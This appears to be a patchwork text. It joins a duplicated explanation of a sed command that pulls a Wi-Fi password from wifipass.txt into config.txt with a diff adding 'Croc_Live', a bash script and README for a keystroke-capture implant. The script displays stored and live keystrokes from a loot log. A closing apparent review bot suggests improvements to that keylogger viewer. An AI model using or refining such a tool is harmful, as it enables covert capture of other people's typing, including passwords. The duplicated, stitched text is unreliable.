s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only.
x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space.
10{G;s/\n(\S+).*/ \1/} - 10{G;s/\n(\S+).*/ \1/}
10{..} executes the commands between the ellipses on the tenth line of config.txt. 10{..} executes the commands between the ellipses on the tenth line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator. G append the contents of hold space to the pattern space using a newline as a separator.
s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column.
11{G;s/\n\S+//} - 11{G;s/\n\S+//}
11{..} executes the commands between the ellipses on the eleventh line of config.txt. 11{..} executes the commands between the ellipses on the eleventh line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator. G append the contents of hold space to the pattern space using a newline as a separator.


@ -0,0 +1,29 @@
# Croc_Live
Script Description: Keyboard Activity Monitor
The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files.
- Display Previous Keystrokes:
- The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed.
- It then searches for files named "croc_char.log" within the current directory and its subdirectories.
- All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files.
- Waiting for Keyboard Activity:
- After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log".
- During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected.
- Show Live Keystrokes:
- Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds.
- A 1-second pause occurs to allow time for the system to update or log any new keyboard activity.
- The terminal screen is then cleared to prepare for the display of live keystrokes.
- A message is shown to inform users that live keystrokes will be displayed.
- The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time.
- Usage:
Place the croc_live.sh file in keycroc tools folder.
To utilize this script, simply execute it in the terminal environment. Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal.
Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored.


@ -0,0 +1,19 @@
#!/bin/bash
# Title: Croc_Live
# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh )
# Author: spywill
# Version: 1.0
# Category: Key Croc
echo -ne "\n\nPrevious keystrokes:\n\n"
find . -type f -name "croc_char.log" -exec cat {} +
until [ -f loot/croc_char.log ]; do
echo -ne "Waiting for keyboard activity\033[0K\r"
done
sleep 1
printf '\033[H\033[2J'
echo -ne "\n\nLive keystrokes:\n\n"
tail -f loot/croc_char.log
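Review bot: The `until [ -f loot/croc_char.log ]` loop has no delay in its body, so it spins at full CPU and rewrites the same terminal line continuously until the log file appears. A pause in the body fixes that: `until [ -f loot/croc_char.log ]; do printf 'Waiting for keyboard activity\033[0K\r'; sleep 1; done`. Both `find .` and `loot/croc_char.log` are relative to the caller's working directory, which the header only implies through its example invocation; a comment such as `# Paths are relative to the current directory; run from the directory that contains loot/` would make that explicit.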